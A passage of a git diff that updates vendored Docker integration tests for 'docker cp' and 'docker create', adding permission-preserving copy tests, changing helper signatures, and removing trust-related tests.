:= containerCpPath(containerID, "file1") - - err := runDockerCp(c, srcPath, dstPath) - c.Assert(err, checker.NotNil) - - c.Assert(isCpNotExist(err), checker.True, check.Commentf("expected IsNotExist error, but got %T: %s", err, err)) -} - -// Test for error when SRC ends in a trailing -// path separator but it exists as a file. -func (s *DockerSuite) TestCpToErrSrcNotDir(c *check.C) { - containerID := makeTestContainer(c, testContainerOptions{}) - - tmpDir := getTestDir(c, "test-cp-to-err-src-not-dir") - defer os.RemoveAll(tmpDir) - - makeTestContentInDir(c, tmpDir) - - srcPath := cpPathTrailingSep(tmpDir, "file1") - dstPath := containerCpPath(containerID, "testDir") - - err := runDockerCp(c, srcPath, dstPath) - c.Assert(err, checker.NotNil) - - c.Assert(isCpNotDir(err), checker.True, check.Commentf("expected IsNotDir error, but got %T: %s", err, err)) -} - -// Test for error when SRC is a valid file or directory, -// bu the DST parent directory does not exist. -func (s *DockerSuite) TestCpToErrDstParentNotExists(c *check.C) { - testRequires(c, DaemonIsLinux) - containerID := makeTestContainer(c, testContainerOptions{addContent: true}) - - tmpDir := getTestDir(c, "test-cp-to-err-dst-parent-not-exists") - defer os.RemoveAll(tmpDir) - - makeTestContentInDir(c, tmpDir) - - // Try with a file source. - srcPath := cpPath(tmpDir, "file1") - dstPath := containerCpPath(containerID, "/notExists", "file1") - - err := runDockerCp(c, srcPath, dstPath) - c.Assert(err, checker.NotNil) - - c.Assert(isCpNotExist(err), checker.True, check.Commentf("expected IsNotExist error, but got %T: %s", err, err)) - - // Try with a directory source. - srcPath = cpPath(tmpDir, "dir1") - - c.Assert(err, checker.NotNil) - - c.Assert(isCpNotExist(err), checker.True, check.Commentf("expected IsNotExist error, but got %T: %s", err, err)) -} - -// Test for error when DST ends in a trailing path separator but exists as a -// file. Also test that we cannot overwrite an existing directory with a -// non-directory and cannot overwrite an existing -func (s *DockerSuite) TestCpToErrDstNotDir(c *check.C) { - testRequires(c, DaemonIsLinux) - containerID := makeTestContainer(c, testContainerOptions{addContent: true}) - - tmpDir := getTestDir(c, "test-cp-to-err-dst-not-dir") - defer os.RemoveAll(tmpDir) - - makeTestContentInDir(c, tmpDir) - - // Try with a file source. - srcPath := cpPath(tmpDir, "dir1/file1-1") - dstPath := containerCpPathTrailingSep(containerID, "file1") - - // The client should encounter an error trying to stat the destination - // and then be unable to copy since the destination is asserted to be a - // directory but does not exist. - err := runDockerCp(c, srcPath, dstPath) - c.Assert(err, checker.NotNil) - - c.Assert(isCpDirNotExist(err), checker.True, check.Commentf("expected DirNotExist error, but got %T: %s", err, err)) - - // Try with a directory source. - srcPath = cpPath(tmpDir, "dir1") - - // The client should encounter an error trying to stat the destination and - // then decide to extract to the parent directory instead with a rebased - // name in the source archive, but this directory would overwrite the - // existing file with the same name. - err = runDockerCp(c, srcPath, dstPath) - c.Assert(err, checker.NotNil) - - c.Assert(isCannotOverwriteNonDirWithDir(err), checker.True, check.Commentf("expected CannotOverwriteNonDirWithDir error, but got %T: %s", err, err)) -} - // Check that copying from a local path to a symlink in a container copies to // the symlink target and does not overwrite the container symlink itself. func (s *DockerSuite) TestCpToSymlinkDestination(c *check.C) { @@ -143,7 +39,7 @@ func (s *DockerSuite) TestCpToSymlinkDestination(c *check.C) { srcPath := cpPath(testVol, "file2") dstPath := containerCpPath(containerID, "/vol2/symlinkToFile1") - c.Assert(runDockerCp(c, srcPath, dstPath), checker.IsNil) + c.Assert(runDockerCp(c, srcPath, dstPath, nil), checker.IsNil) // The symlink should not have been modified. c.Assert(symlinkTargetEquals(c, cpPath(testVol, "symlinkToFile1"), "file1"), checker.IsNil) @@ -155,7 +51,7 @@ func (s *DockerSuite) TestCpToSymlinkDestination(c *check.C) { // This should copy the file into the symlink target directory. dstPath = containerCpPath(containerID, "/vol2/symlinkToDir1") - c.Assert(runDockerCp(c, srcPath, dstPath), checker.IsNil) + c.Assert(runDockerCp(c, srcPath, dstPath, nil), checker.IsNil) // The symlink should not have been modified. c.Assert(symlinkTargetEquals(c, cpPath(testVol, "symlinkToDir1"), "dir1"), checker.IsNil) @@ -168,7 +64,7 @@ func (s *DockerSuite) TestCpToSymlinkDestination(c *check.C) { // contents of the source file. dstPath = containerCpPath(containerID, "/vol2/brokenSymlinkToFileX") - c.Assert(runDockerCp(c, srcPath, dstPath), checker.IsNil) + c.Assert(runDockerCp(c, srcPath, dstPath, nil), checker.IsNil) // The symlink should not have been modified. c.Assert(symlinkTargetEquals(c, cpPath(testVol, "brokenSymlinkToFileX"), "fileX"), checker.IsNil) @@ -182,7 +78,7 @@ func (s *DockerSuite) TestCpToSymlinkDestination(c *check.C) { srcPath = cpPath(testVol, "/dir2") dstPath = containerCpPath(containerID, "/vol2/symlinkToDir1") - c.Assert(runDockerCp(c, srcPath, dstPath), checker.IsNil) + c.Assert(runDockerCp(c, srcPath, dstPath, nil), checker.IsNil) // The symlink should not have been modified. c.Assert(symlinkTargetEquals(c, cpPath(testVol, "symlinkToDir1"), "dir1"), checker.IsNil) @@ -196,7 +92,7 @@ func (s *DockerSuite) TestCpToSymlinkDestination(c *check.C) { // should not modify the symlink. dstPath = containerCpPath(containerID, "/vol2/brokenSymlinkToDirX") - c.Assert(runDockerCp(c, srcPath, dstPath), checker.IsNil) + c.Assert(runDockerCp(c, srcPath, dstPath, nil), checker.IsNil) // The symlink should not have been modified. c.Assert(symlinkTargetEquals(c, cpPath(testVol, "brokenSymlinkToDirX"), "dirX"), checker.IsNil) @@ -237,7 +133,7 @@ func (s *DockerSuite) TestCpToCaseA(c *check.C) { srcPath := cpPath(tmpDir, "file1") dstPath := containerCpPath(containerID, "/root/itWorks.txt") - c.Assert(runDockerCp(c, srcPath, dstPath), checker.IsNil) + c.Assert(runDockerCp(c, srcPath, dstPath, nil), checker.IsNil) c.Assert(containerStartOutputEquals(c, containerID, "file1\n"), checker.IsNil) } @@ -258,7 +154,7 @@ func (s *DockerSuite) TestCpToCaseB(c *check.C) { srcPath := cpPath(tmpDir, "file1") dstDir := containerCpPathTrailingSep(containerID, "testDir") - err := runDockerCp(c, srcPath, dstDir) + err := runDockerCp(c, srcPath, dstDir, nil) c.Assert(err, checker.NotNil) c.Assert(isCpDirNotExist(err), checker.True, check.Commentf("expected DirNotExists error, but got %T: %s", err, err)) @@ -284,7 +180,7 @@ func (s *DockerSuite) TestCpToCaseC(c *check.C) { // Ensure the container's file starts with the original content. c.Assert(containerStartOutputEquals(c, containerID, "file2\n"), checker.IsNil) - c.Assert(runDockerCp(c, srcPath, dstPath), checker.IsNil) + c.Assert(runDockerCp(c, srcPath, dstPath, nil), checker.IsNil) // Should now contain file1's contents. c.Assert(containerStartOutputEquals(c, containerID, "file1\n"), checker.IsNil) @@ -311,7 +207,7 @@ func (s *DockerSuite) TestCpToCaseD(c *check.C) { // Ensure that dstPath doesn't exist. c.Assert(containerStartOutputEquals(c, containerID, ""), checker.IsNil) - c.Assert(runDockerCp(c, srcPath, dstDir), checker.IsNil) + c.Assert(runDockerCp(c, srcPath, dstDir, nil), checker.IsNil) // Should now contain file1's contents. c.Assert(containerStartOutputEquals(c, containerID, "file1\n"), checker.IsNil) @@ -329,7 +225,7 @@ func (s *DockerSuite) TestCpToCaseD(c *check.C) { // Ensure that dstPath doesn't exist. c.Assert(containerStartOutputEquals(c, containerID, ""), checker.IsNil) - c.Assert(runDockerCp(c, srcPath, dstDir), checker.IsNil) + c.Assert(runDockerCp(c, srcPath, dstDir, nil), checker.IsNil) // Should now contain file1's contents. c.Assert(containerStartOutputEquals(c, containerID, "file1\n"), checker.IsNil) @@ -352,7 +248,7 @@ func (s *DockerSuite) TestCpToCaseE(c *check.C) { srcDir := cpPath(tmpDir, "dir1") dstDir := containerCpPath(containerID, "testDir") - c.Assert(runDockerCp(c, srcDir, dstDir), checker.IsNil) + c.Assert(runDockerCp(c, srcDir, dstDir, nil), checker.IsNil) // Should now contain file1-1's contents. c.Assert(containerStartOutputEquals(c, containerID, "file1-1\n"), checker.IsNil) @@ -366,7 +262,7 @@ func (s *DockerSuite) TestCpToCaseE(c *check.C) { dstDir = containerCpPathTrailingSep(containerID, "testDir") - c.Assert(runDockerCp(c, srcDir, dstDir), checker.IsNil) + c.Assert(runDockerCp(c, srcDir, dstDir, nil), checker.IsNil) // Should now contain file1-1's contents. c.Assert(containerStartOutputEquals(c, containerID, "file1-1\n"), checker.IsNil) @@ -388,7 +284,7 @@ func (s *DockerSuite) TestCpToCaseF(c *check.C) { srcDir := cpPath(tmpDir, "dir1") dstFile := containerCpPath(containerID, "/root/file1") - err := runDockerCp(c, srcDir, dstFile) + err := runDockerCp(c, srcDir, dstFile, nil) c.Assert(err, checker.NotNil) c.Assert(isCpCannotCopyDir(err), checker.True, check.Commentf("expected ErrCannotCopyDir error, but got %T: %s", err, err)) @@ -415,7 +311,7 @@ func (s *DockerSuite) TestCpToCaseG(c *check.C) { // Ensure that dstPath doesn't exist. c.Assert(containerStartOutputEquals(c, containerID, ""), checker.IsNil) - c.Assert(runDockerCp(c, srcDir, dstDir), checker.IsNil) + c.Assert(runDockerCp(c, srcDir, dstDir, nil), checker.IsNil) // Should now contain file1-1's contents. c.Assert(containerStartOutputEquals(c, containerID, "file1-1\n"), checker.IsNil) @@ -433,7 +329,7 @@ func (s *DockerSuite) TestCpToCaseG(c *check.C) { // Ensure that dstPath doesn't exist. c.Assert(containerStartOutputEquals(c, containerID, ""), checker.IsNil) - c.Assert(runDockerCp(c, srcDir, dstDir), checker.IsNil) + c.Assert(runDockerCp(c, srcDir, dstDir, nil), checker.IsNil) // Should now contain file1-1's contents. c.Assert(containerStartOutputEquals(c, containerID, "file1-1\n"), checker.IsNil) @@ -456,7 +352,7 @@ func (s *DockerSuite) TestCpToCaseH(c *check.C) { srcDir := cpPathTrailingSep(tmpDir, "dir1") + "." dstDir := containerCpPath(containerID, "testDir") - c.Assert(runDockerCp(c, srcDir, dstDir), checker.IsNil) + c.Assert(runDockerCp(c, srcDir, dstDir, nil), checker.IsNil) // Should now contain file1-1's contents. c.Assert(containerStartOutputEquals(c, containerID, "file1-1\n"), checker.IsNil) @@ -470,7 +366,7 @@ func (s *DockerSuite) TestCpToCaseH(c *check.C) { dstDir = containerCpPathTrailingSep(containerID, "testDir") - c.Assert(runDockerCp(c, srcDir, dstDir), checker.IsNil) + c.Assert(runDockerCp(c, srcDir, dstDir, nil), checker.IsNil) // Should now contain file1-1's contents. c.Assert(containerStartOutputEquals(c, containerID, "file1-1\n"), checker.IsNil) @@ -493,7 +389,7 @@ func (s *DockerSuite) TestCpToCaseI(c *check.C) { srcDir := cpPathTrailingSep(tmpDir, "dir1") + "." dstFile := containerCpPath(containerID, "/root/file1") - err := runDockerCp(c, srcDir, dstFile) + err := runDockerCp(c, srcDir, dstFile, nil) c.Assert(err, checker.NotNil) c.Assert(isCpCannotCopyDir(err), checker.True, check.Commentf("expected ErrCannotCopyDir error, but got %T: %s", err, err)) @@ -521,7 +417,7 @@ func (s *DockerSuite) TestCpToCaseJ(c *check.C) { // Ensure that dstPath doesn't exist. c.Assert(containerStartOutputEquals(c, containerID, ""), checker.IsNil) - c.Assert(runDockerCp(c, srcDir, dstDir), checker.IsNil) + c.Assert(runDockerCp(c, srcDir, dstDir, nil), checker.IsNil) // Should now contain file1-1's contents. c.Assert(containerStartOutputEquals(c, containerID, "file1-1\n"), checker.IsNil) @@ -538,7 +434,7 @@ func (s *DockerSuite) TestCpToCaseJ(c *check.C) { // Ensure that dstPath doesn't exist. c.Assert(containerStartOutputEquals(c, containerID, ""), checker.IsNil) - c.Assert(runDockerCp(c, srcDir, dstDir), checker.IsNil) + c.Assert(runDockerCp(c, srcDir, dstDir, nil), checker.IsNil) // Should now contain file1-1's contents. c.Assert(containerStartOutputEquals(c, containerID, "file1-1\n"), checker.IsNil) @@ -562,7 +458,7 @@ func (s *DockerSuite) TestCpToErrReadOnlyRootfs(c *check.C) { srcPath := cpPath(tmpDir, "file1") dstPath := containerCpPath(containerID, "/root/shouldNotExist") - err := runDockerCp(c, srcPath, dstPath) + err := runDockerCp(c, srcPath, dstPath, nil) c.Assert(err, checker.NotNil) c.Assert(isCpCannotCopyReadOnly(err), checker.True, check.Commentf("expected ErrContainerRootfsReadonly error, but got %T: %s", err, err)) @@ -589,7 +485,7 @@ func (s *DockerSuite) TestCpToErrReadOnlyVolume(c *check.C) { srcPath := cpPath(tmpDir, "file1") dstPath := containerCpPath(containerID, "/vol_ro/shouldNotExist") - err := runDockerCp(c, srcPath, dstPath) + err := runDockerCp(c, srcPath, dstPath, nil) c.Assert(err, checker.NotNil) c.Assert(isCpCannotCopyReadOnly(err), checker.True, check.Commentf("expected ErrVolumeReadonly error, but got %T: %s", err, err)) diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_cp_to_container_unix_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_cp_to_container_unix_test.go index 45d85ba5d1..8f830dcf9d 100644 --- a/vendor/github.com/docker/docker/integration-cli/docker_cli_cp_to_container_unix_test.go +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_cp_to_container_unix_test.go @@ -6,12 +6,37 @@ import ( "fmt" "os" "path/filepath" + "strconv" + "strings" - "github.com/docker/docker/pkg/integration/checker" + "github.com/docker/docker/integration-cli/checker" "github.com/docker/docker/pkg/system" "github.com/go-check/check" ) +func (s *DockerSuite) TestCpToContainerWithPermissions(c *check.C) { + testRequires(c, SameHostDaemon, DaemonIsLinux) + + tmpDir := getTestDir(c, "test-cp-to-host-with-permissions") + defer os.RemoveAll(tmpDir) + + makeTestContentInDir(c, tmpDir) + + containerName := "permtest" + + _, exc := dockerCmd(c, "create", "--name", containerName, "debian:jessie", "/bin/bash", "-c", "stat -c '%u %g %a' /permdirtest /permdirtest/permtest") + c.Assert(exc, checker.Equals, 0) + defer dockerCmd(c, "rm", "-f", containerName) + + srcPath := cpPath(tmpDir, "permdirtest") + dstPath := containerCpPath(containerName, "/") + c.Assert(runDockerCp(c, srcPath, dstPath, []string{"-a"}), checker.IsNil) + + out, err := startContainerGetOutput(c, containerName) + c.Assert(err, checker.IsNil, check.Commentf("output: %v", out)) + c.Assert(strings.TrimSpace(out), checker.Equals, "2 2 700\n65534 65534 400", check.Commentf("output: %v", out)) +} + // Check ownership is root, both in non-userns and userns enabled modes func (s *DockerSuite) TestCpCheckDestOwnership(c *check.C) { testRequires(c, DaemonIsLinux, SameHostDaemon) @@ -27,7 +52,7 @@ func (s *DockerSuite) TestCpCheckDestOwnership(c *check.C) { srcPath := cpPath(tmpDir, "file1") dstPath := containerCpPath(containerID, "/tmpvol", "file1") - err := runDockerCp(c, srcPath, dstPath) + err := runDockerCp(c, srcPath, dstPath, nil) c.Assert(err, checker.IsNil) stat, err := system.Stat(filepath.Join(tmpVolDir, "file1")) @@ -37,3 +62,20 @@ func (s *DockerSuite) TestCpCheckDestOwnership(c *check.C) { c.Assert(stat.UID(), checker.Equals, uint32(uid), check.Commentf("Copied file not owned by container root UID")) c.Assert(stat.GID(), checker.Equals, uint32(gid), check.Commentf("Copied file not owned by container root GID")) } + +func getRootUIDGID() (int, int, error) { + uidgid := strings.Split(filepath.Base(testEnv.DaemonInfo.DockerRootDir), ".") + if len(uidgid) == 1 { + //user namespace remapping is not turned on; return 0 + return 0, 0, nil + } + uid, err := strconv.Atoi(uidgid[0]) + if err != nil { + return 0, 0, err + } + gid, err := strconv.Atoi(uidgid[1]) + if err != nil { + return 0, 0, err + } + return uid, gid, nil +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_cp_utils.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_cp_utils_test.go similarity index 76% rename from vendor/github.com/docker/docker/integration-cli/docker_cli_cp_utils.go rename to vendor/github.com/docker/docker/integration-cli/docker_cli_cp_utils_test.go index 0501c5d735..79a016f0c6 100644 --- a/vendor/github.com/docker/docker/integration-cli/docker_cli_cp_utils.go +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_cp_utils_test.go @@ -7,10 +7,11 @@ import ( "os" "os/exec" "path/filepath" + "runtime" "strings" + "github.com/docker/docker/integration-cli/checker" "github.com/docker/docker/pkg/archive" - "github.com/docker/docker/pkg/integration/checker" "github.com/go-check/check" ) @@ -26,6 +27,9 @@ type fileData struct { filetype fileType path string contents string + uid int + gid int + mode int } func (fd fileData) creationCommand() string { @@ -55,31 +59,33 @@ func mkFilesCommand(fds []fileData) string { } var defaultFileData = []fileData{ - {ftRegular, "file1", "file1"}, - {ftRegular, "file2", "file2"}, - {ftRegular, "file3", "file3"}, - {ftRegular, "file4", "file4"}, - {ftRegular, "file5", "file5"}, - {ftRegular, "file6", "file6"}, - {ftRegular, "file7", "file7"}, - {ftDir, "dir1", ""}, - {ftRegular, "dir1/file1-1", "file1-1"}, - {ftRegular, "dir1/file1-2", "file1-2"}, - {ftDir, "dir2", ""}, - {ftRegular, "dir2/file2-1", "file2-1"}, - {ftRegular, "dir2/file2-2", "file2-2"}, - {ftDir, "dir3", ""}, - {ftRegular, "dir3/file3-1", "file3-1"}, - {ftRegular, "dir3/file3-2", "file3-2"}, - {ftDir, "dir4", ""}, - {ftRegular, "dir4/file3-1", "file4-1"}, - {ftRegular, "dir4/file3-2", "file4-2"}, - {ftDir, "dir5", ""}, - {ftSymlink, "symlinkToFile1", "file1"}, - {ftSymlink, "symlinkToDir1", "dir1"}, - {ftSymlink, "brokenSymlinkToFileX", "fileX"}, - {ftSymlink, "brokenSymlinkToDirX", "dirX"}, - {ftSymlink, "symlinkToAbsDir", "/root"}, + {ftRegular, "file1", "file1", 0, 0, 0666}, + {ftRegular, "file2", "file2", 0, 0, 0666}, + {ftRegular, "file3", "file3", 0, 0, 0666}, + {ftRegular, "file4", "file4", 0, 0, 0666}, + {ftRegular, "file5", "file5", 0, 0, 0666}, + {ftRegular, "file6", "file6", 0, 0, 0666}, + {ftRegular, "file7", "file7", 0, 0, 0666}, + {ftDir, "dir1", "", 0, 0, 0777}, + {ftRegular, "dir1/file1-1", "file1-1", 0, 0, 0666}, + {ftRegular, "dir1/file1-2", "file1-2", 0, 0, 0666}, + {ftDir, "dir2", "", 0, 0, 0666}, + {ftRegular, "dir2/file2-1", "file2-1", 0, 0, 0666}, + {ftRegular, "dir2/file2-2", "file2-2", 0, 0, 0666}, + {ftDir, "dir3", "", 0, 0, 0666}, + {ftRegular, "dir3/file3-1", "file3-1", 0, 0, 0666}, + {ftRegular, "dir3/file3-2", "file3-2", 0, 0, 0666}, + {ftDir, "dir4", "", 0, 0, 0666}, + {ftRegular, "dir4/file3-1", "file4-1", 0, 0, 0666}, + {ftRegular, "dir4/file3-2", "file4-2", 0, 0, 0666}, + {ftDir, "dir5", "", 0, 0, 0666}, + {ftSymlink, "symlinkToFile1", "file1", 0, 0, 0666}, + {ftSymlink, "symlinkToDir1", "dir1", 0, 0, 0666}, + {ftSymlink, "brokenSymlinkToFileX", "fileX", 0, 0, 0666}, + {ftSymlink, "brokenSymlinkToDirX", "dirX", 0, 0, 0666}, + {ftSymlink, "symlinkToAbsDir", "/root", 0, 0, 0666}, + {ftDir, "permdirtest", "", 2, 2, 0700}, + {ftRegular, "permdirtest/permtest", "perm_test", 65534, 65534, 0400}, } func defaultMkContentCommand() string { @@ -91,12 +97,16 @@ func makeTestContentInDir(c *check.C, dir string) { path := filepath.Join(dir, filepath.FromSlash(fd.path)) switch fd.filetype { case ftRegular: - c.Assert(ioutil.WriteFile(path, []byte(fd.contents+"\n"), os.FileMode(0666)), checker.IsNil) + c.Assert(ioutil.WriteFile(path, []byte(fd.contents+"\n"), os.FileMode(fd.mode)), checker.IsNil) case ftDir: - c.Assert(os.Mkdir(path, os.FileMode(0777)), checker.IsNil) + c.Assert(os.Mkdir(path, os.FileMode(fd.mode)), checker.IsNil) case ftSymlink: c.Assert(os.Symlink(fd.contents, path), checker.IsNil) } + + if fd.filetype != ftSymlink && runtime.GOOS != "windows" { + c.Assert(os.Chown(path, fd.uid, fd.gid), checker.IsNil) + } } } @@ -178,10 +188,14 @@ func containerCpPathTrailingSep(containerID string, pathElements ...string) stri return fmt.Sprintf("%s/", containerCpPath(containerID, pathElements...)) } -func runDockerCp(c *check.C, src, dst string) (err error) { - c.Logf("running `docker cp %s %s`", src, dst) +func runDockerCp(c *check.C, src, dst string, params []string) (err error) { + c.Logf("running `docker cp %s %s %s`", strings.Join(params, " "), src, dst) + + args := []string{"cp"} - args := []string{"cp", src, dst} + args = append(args, params...) + + args = append(args, src, dst) out, _, err := runCommandWithOutput(exec.Command(dockerBinary, args...)) if err != nil { @@ -214,18 +228,10 @@ func getTestDir(c *check.C, label string) (tmpDir string) { return } -func isCpNotExist(err error) bool { - return strings.Contains(err.Error(), "no such file or directory") || strings.Contains(err.Error(), "cannot find the file specified") -} - func isCpDirNotExist(err error) bool { return strings.Contains(err.Error(), archive.ErrDirNotExists.Error()) } -func isCpNotDir(err error) bool { - return strings.Contains(err.Error(), archive.ErrNotDirectory.Error()) || strings.Contains(err.Error(), "filename, directory name, or volume label syntax is incorrect") -} - func isCpCannotCopyDir(err error) bool { return strings.Contains(err.Error(), archive.ErrCannotCopyDir.Error()) } @@ -234,10 +240,6 @@ func isCpCannotCopyReadOnly(err error) bool { return strings.Contains(err.Error(), "marked read-only") } -func isCannotOverwriteNonDirWithDir(err error) bool { - return strings.Contains(err.Error(), "cannot overwrite non-directory") -} - func fileContentEquals(c *check.C, filename, contents string) (err error) { c.Logf("checking that file %q contains %q\n", filename, contents) @@ -289,7 +291,7 @@ func containerStartOutputEquals(c *check.C, containerID, contents string) (err e } func defaultVolumes(tmpDir string) []string { - if SameHostDaemon.Condition() { + if SameHostDaemon() { return []string{ "/vol1", fmt.Sprintf("%s:/vol2", tmpDir), diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_create_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_create_test.go index 515a340976..9ec400b2e1 100644 --- a/vendor/github.com/docker/docker/integration-cli/docker_cli_create_test.go +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_create_test.go @@ -8,11 +8,10 @@ import ( "strings" "time" - "os/exec" - - "io/ioutil" - - "github.com/docker/docker/pkg/integration/checker" + "github.com/docker/docker/integration-cli/checker" + "github.com/docker/docker/integration-cli/cli" + "github.com/docker/docker/integration-cli/cli/build" + "github.com/docker/docker/internal/test/fakecontext" "github.com/docker/docker/pkg/stringid" "github.com/docker/go-connections/nat" "github.com/go-check/check" @@ -27,13 +26,13 @@ func (s *DockerSuite) TestCreateArgs(c *check.C) { out, _ = dockerCmd(c, "inspect", cleanedContainerID) - containers := []struct { + var containers []struct { ID string Created time.Time Path string Args []string Image string - }{} + } err := json.Unmarshal([]byte(out), &containers) c.Assert(err, check.IsNil, check.Commentf("Error inspecting the container: %s", err)) @@ -59,7 +58,7 @@ func (s *DockerSuite) TestCreateArgs(c *check.C) { // Make sure we can grow the container's rootfs at creation time. func (s *DockerSuite) TestCreateGrowRootfs(c *check.C) { // Windows and Devicemapper support growing the rootfs - if daemonPlatform != "windows" { + if testEnv.OSType != "windows" { testRequires(c, Devicemapper) } out, _ := dockerCmd(c, "create", "--storage-opt", "size=120G", "busybox") @@ -88,11 +87,11 @@ func (s *DockerSuite) TestCreateHostConfig(c *check.C) { out, _ = dockerCmd(c, "inspect", cleanedContainerID) - containers := []struct { + var containers []struct { HostConfig *struct { PublishAllPorts bool } - }{} + } err := json.Unmarshal([]byte(out), &containers) c.Assert(err, check.IsNil, check.Commentf("Error inspecting the container: %s", err)) @@ -110,11 +109,11 @@ func (s *DockerSuite) TestCreateWithPortRange(c *check.C) { out, _ = dockerCmd(c, "inspect", cleanedContainerID) - containers := []struct { + var containers []struct { HostConfig *struct { PortBindings map[nat.Port][]nat.PortBinding } - }{} + } err := json.Unmarshal([]byte(out), &containers) c.Assert(err, check.IsNil, check.Commentf("Error inspecting the container: %s", err)) c.Assert(containers, checker.HasLen, 1) @@ -139,11 +138,11 @@ func (s *DockerSuite) TestCreateWithLargePortRange(c *check.C) { out, _ = dockerCmd(c, "inspect", cleanedContainerID) - containers := []struct { + var containers []struct { HostConfig *struct { PortBindings map[nat.Port][]nat.PortBinding } - }{} + } err := json.Unmarshal([]byte(out), &containers) c.Assert(err, check.IsNil, check.Commentf("Error inspecting the container: %s", err)) @@ -196,7 +195,7 @@ func (s *DockerSuite) TestCreateLabels(c *check.C) { dockerCmd(c, "create", "--name", name, "-l", "k1=v1", "--label", "k2=v2", "busybox") actual := make(map[string]string) - inspectFieldAndMarshall(c, name, "Config.Labels", &actual) + inspectFieldAndUnmarshall(c, name, "Config.Labels", &actual) if !reflect.DeepEqual(expected, actual) { c.Fatalf("Expected %s got %s", expected, actual) @@ -205,19 +204,15 @@ func (s *DockerSuite) TestCreateLabels(c *check.C) { func (s *DockerSuite) TestCreateLabelFromImage(c *check.C) { imageName := "testcreatebuildlabel" - _, err := buildImage(imageName, - `FROM busybox - LABEL k1=v1 k2=v2`, - true) - - c.Assert(err, check.IsNil) + buildImageSuccessfully(c, imageName, build.WithDockerfile(`FROM busybox + LABEL k1=v1 k2=v2`)) name := "test_create_labels_from_image" expected := map[string]string{"k2": "x", "k3": "v3", "k1": "v1"} dockerCmd(c, "create", "--name", name, "-l", "k2=x", "--label", "k3=v3", imageName) actual := make(map[string]string) - inspectFieldAndMarshall(c, name, "Config.Labels", &actual) + inspectFieldAndUnmarshall(c, name, "Config.Labels", &actual) if !reflect.DeepEqual(expected, actual) { c.Fatalf("Expected %s got %s", expected, actual) @@ -227,8 +222,8 @@ func (s *DockerSuite) TestCreateLabelFromImage(c *check.C) { func (s *DockerSuite) TestCreateHostnameWithNumber(c *check.C) { image := "busybox" // Busybox on Windows does not implement hostname command - if daemonPlatform == "windows" { - image = WindowsBaseImage + if testEnv.OSType == "windows" { + image = testEnv.PlatformDefaults.BaseImage } out, _ := dockerCmd(c, "run", "-h", "web.0", image, "hostname") c.Assert(strings.TrimSpace(out), checker.Equals, "web.0", check.Commentf("hostname not set, expected `web.0`, got: %s", out)) @@ -264,18 +259,13 @@ func (s *DockerSuite) TestCreateModeIpcContainer(c *check.C) { func (s *DockerSuite) TestCreateByImageID(c *check.C) { imageName := "testcreatebyimageid" - imageID, err := buildImage(imageName, - `FROM busybox - MAINTAINER dockerio`, - true) - if err != nil { - c.Fatal(err) - } + buildImageSuccessfully(c, imageName, build.WithDockerfile(`FROM busybox + MAINTAINER dockerio`)) + imageID := getIDByName(c, imageName) truncatedImageID := stringid.TruncateID(imageID) dockerCmd(c, "create", imageID) dockerCmd(c, "create", truncatedImageID) - dockerCmd(c, "create", fmt.Sprintf("%s:%s", imageName, truncatedImageID)) // Ensure this fails out, exit, _ := dockerCmdWithError("create", fmt.Sprintf("%s:%s", imageName, imageID)) @@ -283,11 +273,14 @@ func (s *DockerSuite) TestCreateByImageID(c *check.C) { c.Fatalf("expected non-zero exit code; received %d", exit) } - if expected := "Error parsing reference"; !strings.Contains(out, expected) { + if expected := "invalid reference format"; !strings.Contains(out, expected) { c.Fatalf(`Expected %q in output; got: %s`, expected, out) } - out, exit, _ = dockerCmdWithError("create", fmt.Sprintf("%s:%s", "wrongimage", truncatedImageID)) + if i := strings.IndexRune(imageID, ':'); i >= 0 { + imageID = imageID[i+1:] + } + out, exit, _ = dockerCmdWithError("create", fmt.Sprintf("%s:%s", "wrongimage", imageID)) if exit == 0 { c.Fatalf("expected non-zero exit code; received %d", exit) } @@ -297,138 +290,6 @@ func (s *DockerSuite) TestCreateByImageID(c *check.C) { } } -func (s *DockerTrustSuite) TestTrustedCreate(c *check.C) { - repoName := s.setupTrustedImage(c, "trusted-create") - - // Try create - createCmd := exec.Command(dockerBinary, "create", repoName) - s.trustedCmd(createCmd) - out, _, err := runCommandWithOutput(createCmd) - c.Assert(err, check.IsNil) - c.Assert(string(out), checker.Contains, "Tagging", check.Commentf("Missing expected output on trusted push:\n%s", out)) - - dockerCmd(c, "rmi", repoName) - - // Try untrusted create to ensure we pushed the tag to the registry - createCmd = exec.Command(dockerBinary, "create", "--disable-content-trust=true", repoName) - s.trustedCmd(createCmd) - out, _, err = runCommandWithOutput(createCmd) - c.Assert(err, check.IsNil) - c.Assert(string(out), checker.Contains, "Status: Downloaded", check.Commentf("Missing expected output on trusted create with --disable-content-trust:\n%s", out)) - -} - -func (s *DockerTrustSuite) TestUntrustedCreate(c *check.C) { - repoName := fmt.Sprintf("%v/dockercliuntrusted/createtest", privateRegistryURL) - withTagName := fmt.Sprintf("%s:latest", repoName) - // tag the image and upload it to the private registry - dockerCmd(c, "tag", "busybox", withTagName) - dockerCmd(c, "push", withTagName) - dockerCmd(c, "rmi", withTagName) - - // Try trusted create on untrusted tag - createCmd := exec.Command(dockerBinary, "create", withTagName) - s.trustedCmd(createCmd) - out, _, err := runCommandWithOutput(createCmd) - c.Assert(err, check.Not(check.IsNil)) - c.Assert(string(out), checker.Contains, fmt.Sprintf("does not have trust data for %s", repoName), check.Commentf("Missing expected output on trusted create:\n%s", out)) - -} - -func (s *DockerTrustSuite) TestTrustedIsolatedCreate(c *check.C) { - repoName := s.setupTrustedImage(c, "trusted-isolated-create") - - // Try create - createCmd := exec.Command(dockerBinary, "--config", "/tmp/docker-isolated-create", "create", repoName) - s.trustedCmd(createCmd) - out, _, err := runCommandWithOutput(createCmd) - c.Assert(err, check.IsNil) - c.Assert(string(out), checker.Contains, "Tagging", check.Commentf("Missing expected output on trusted push:\n%s", out)) - - dockerCmd(c, "rmi", repoName) -} - -func (s *DockerTrustSuite) TestCreateWhenCertExpired(c *check.C) { - c.Skip("Currently changes system time, causing instability") - repoName := s.setupTrustedImage(c, "trusted-create-expired") - - // Certificates have 10 years of expiration - elevenYearsFromNow := time.Now().Add(time.Hour * 24 